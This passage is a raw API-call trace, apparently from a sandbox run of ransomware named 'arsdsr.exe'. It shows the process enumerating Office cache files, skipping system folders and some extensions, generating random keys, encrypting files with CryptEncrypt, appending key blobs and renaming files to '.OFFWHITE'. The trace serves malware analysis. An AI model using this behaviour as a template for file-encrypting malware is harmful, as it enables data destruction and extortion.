ftLastWriteTime.dwLowDateTime=0xa5ddcc70, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0087.611] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2=".") returned 1 [0087.612] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="..") returned 1 [0087.612] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="...") returned 1 [0087.612] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="windows") returned -1 [0087.612] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="$recycle.bin") returned 1 [0087.612] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="rsa") returned -1 [0087.612] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="ntuser.dat") returned 1 [0087.612] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="programdata") returned -1 [0087.612] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="appdata") returned 1 [0087.612] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="program files") returned -1 [0087.612] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="program files (x86)") returned -1 [0087.612] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.612] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="OWOW32WW.cab" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" [0087.612] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.612] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.612] PathFindExtensionW (pszPath="OWOW32WW.cab") returned=".cab" [0087.612] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0087.612] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0087.612] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0087.612] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7bd91af0, ftCreationTime.dwHighDateTime=0x1cb07b2, ftLastAccessTime.dwLowDateTime=0x7bd91af0, ftLastAccessTime.dwHighDateTime=0x1cb07b2, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0087.612] lstrcmpiW (lpString1="PidGenX.dll", lpString2=".") returned 1 [0087.612] lstrcmpiW (lpString1="PidGenX.dll", lpString2="..") returned 1 [0087.612] lstrcmpiW (lpString1="PidGenX.dll", lpString2="...") returned 1 [0087.613] lstrcmpiW (lpString1="PidGenX.dll", lpString2="windows") returned -1 [0087.613] lstrcmpiW (lpString1="PidGenX.dll", lpString2="$recycle.bin") returned 1 [0087.613] lstrcmpiW (lpString1="PidGenX.dll", lpString2="rsa") returned -1 [0087.613] lstrcmpiW (lpString1="PidGenX.dll", lpString2="ntuser.dat") returned 1 [0087.613] lstrcmpiW (lpString1="PidGenX.dll", lpString2="programdata") returned -1 [0087.613] lstrcmpiW (lpString1="PidGenX.dll", lpString2="appdata") returned 1 [0087.613] lstrcmpiW (lpString1="PidGenX.dll", lpString2="program files") returned -1 [0087.613] lstrcmpiW (lpString1="PidGenX.dll", lpString2="program files (x86)") returned -1 [0087.613] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.613] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="PidGenX.dll" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" [0087.613] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.613] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.613] PathFindExtensionW (pszPath="PidGenX.dll") returned=".dll" [0087.613] lstrcmpiW (lpString1=".dll", lpString2=".exe") returned -1 [0087.613] lstrcmpiW (lpString1=".dll", lpString2=".log") returned -1 [0087.613] lstrcmpiW (lpString1=".dll", lpString2=".cab") returned 1 [0087.613] lstrcmpiW (lpString1=".dll", lpString2=".cmd") returned 1 [0087.613] lstrcmpiW (lpString1=".dll", lpString2=".com") returned 1 [0087.613] lstrcmpiW (lpString1=".dll", lpString2=".cpl") returned 1 [0087.613] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0087.613] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0087.613] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a2397e0, ftCreationTime.dwHighDateTime=0x1cbe19a, ftLastAccessTime.dwLowDateTime=0x2a2397e0, ftLastAccessTime.dwHighDateTime=0x1cbe19a, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0087.613] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2=".") returned 1 [0087.613] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="..") returned 1 [0087.613] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="...") returned 1 [0087.613] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="windows") returned -1 [0087.614] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$recycle.bin") returned 1 [0087.614] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="rsa") returned -1 [0087.614] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="ntuser.dat") returned 1 [0087.614] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="programdata") returned -1 [0087.614] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="appdata") returned 1 [0087.614] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="program files") returned -1 [0087.614] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="program files (x86)") returned -1 [0087.614] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.614] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="pkeyconfig-office.xrm-ms" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" [0087.614] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.614] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.614] PathFindExtensionW (pszPath="pkeyconfig-office.xrm-ms") returned=".xrm-ms" [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".exe") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".log") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".cab") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".cmd") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".com") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".cpl") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".ini") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".dll") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".url") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".ttf") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".mp3") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".pif") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".mp4") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".OFFWHITE") returned 1 [0087.614] lstrcmpiW (lpString1=".xrm-ms", lpString2=".msi") returned 1 [0087.615] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0087.615] GetProcessHeap () returned 0x500000 [0087.615] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547d58 [0087.615] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0087.621] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=715834) returned 1 [0087.621] GetProcessHeap () returned 0x500000 [0087.621] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0087.621] GetProcessHeap () returned 0x500000 [0087.621] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0087.621] GetProcessHeap () returned 0x500000 [0087.621] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0087.621] GetProcessHeap () returned 0x500000 [0087.621] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0087.621] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.621] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.621] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0087.621] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.621] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.621] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0087.621] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.621] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.621] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0087.621] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.621] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.622] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0087.622] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xaec3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.622] SetLastError (dwErrCode=0x0) [0087.622] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.625] GetLastError () returned 0x0 [0087.625] GetLastError () returned 0x0 [0087.625] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xaed3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.625] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.626] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xaee3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.626] WriteFile (in: hFile=0x21c, lpBuffer=0x547d58*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547d58*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0087.626] GetProcessHeap () returned 0x500000 [0087.626] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xaec3a) returned 0x2960020 [0087.626] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.626] ReadFile (in: hFile=0x21c, lpBuffer=0x2960020, nNumberOfBytesToRead=0xaec3a, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesRead=0x295e540*=0xaec3a, lpOverlapped=0x0) returned 1 [0087.695] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.696] WriteFile (in: hFile=0x21c, lpBuffer=0x2960020*, nNumberOfBytesToWrite=0xaec3a, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesWritten=0x295e54c*=0xaec3a, lpOverlapped=0x0) returned 1 [0087.698] GetProcessHeap () returned 0x500000 [0087.698] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960020 | out: hHeap=0x500000) returned 1 [0087.702] CloseHandle (hObject=0x21c) returned 1 [0087.715] GetProcessHeap () returned 0x500000 [0087.715] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0087.715] GetProcessHeap () returned 0x500000 [0087.715] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0087.715] GetProcessHeap () returned 0x500000 [0087.715] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0087.715] GetProcessHeap () returned 0x500000 [0087.715] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0087.715] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" [0087.715] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.OFFWHITE") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.OFFWHITE" [0087.715] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.OFFWHITE" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.offwhite")) returned 1 [0087.716] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c1614f0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c1614f0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xa4c400, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="PrjProrWW.msi", cAlternateFileName="PRJPRO~1.MSI")) returned 1 [0087.716] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2=".") returned 1 [0087.717] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="..") returned 1 [0087.717] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="...") returned 1 [0087.717] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="windows") returned -1 [0087.717] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="$recycle.bin") returned 1 [0087.717] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="rsa") returned -1 [0087.717] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="ntuser.dat") returned 1 [0087.717] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="programdata") returned -1 [0087.717] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="appdata") returned 1 [0087.717] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="program files") returned -1 [0087.717] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="program files (x86)") returned -1 [0087.717] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.717] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="PrjProrWW.msi" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" [0087.717] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.717] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.717] PathFindExtensionW (pszPath="PrjProrWW.msi") returned=".msi" [0087.717] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0087.717] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0087.717] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0087.717] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0087.717] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0087.717] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0087.717] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0087.717] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0087.717] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0087.717] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0087.718] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0087.718] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0087.718] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0087.718] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0087.718] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0087.718] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cabec50, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7cabec50, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="PrjProrWW.xml", cAlternateFileName="PRJPRO~1.XML")) returned 1 [0087.718] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2=".") returned 1 [0087.718] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="..") returned 1 [0087.718] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="...") returned 1 [0087.718] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="windows") returned -1 [0087.718] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="$recycle.bin") returned 1 [0087.718] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="rsa") returned -1 [0087.718] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="ntuser.dat") returned 1 [0087.718] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="programdata") returned -1 [0087.718] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="appdata") returned 1 [0087.718] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="program files") returned -1 [0087.718] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="program files (x86)") returned -1 [0087.718] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.718] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="PrjProrWW.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" [0087.718] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.718] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.718] PathFindExtensionW (pszPath="PrjProrWW.xml") returned=".xml" [0087.718] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0087.718] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0087.719] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0087.719] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0087.719] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0087.719] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0087.719] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0087.719] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0087.719] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0087.719] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0087.719] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0087.719] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0087.719] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0087.719] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0087.719] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0087.719] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0087.719] GetProcessHeap () returned 0x500000 [0087.719] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547d68 [0087.719] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0087.738] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=6421) returned 1 [0087.738] GetProcessHeap () returned 0x500000 [0087.738] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0087.738] GetProcessHeap () returned 0x500000 [0087.738] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0087.738] GetProcessHeap () returned 0x500000 [0087.738] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0087.738] GetProcessHeap () returned 0x500000 [0087.738] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0087.738] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.738] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.738] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0087.738] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.738] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.738] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0087.738] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.738] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.738] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0087.739] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.739] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.739] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0087.739] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1915, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.739] SetLastError (dwErrCode=0x0) [0087.739] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.741] GetLastError () returned 0x0 [0087.741] GetLastError () returned 0x0 [0087.741] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1a15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.741] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.741] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1b15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 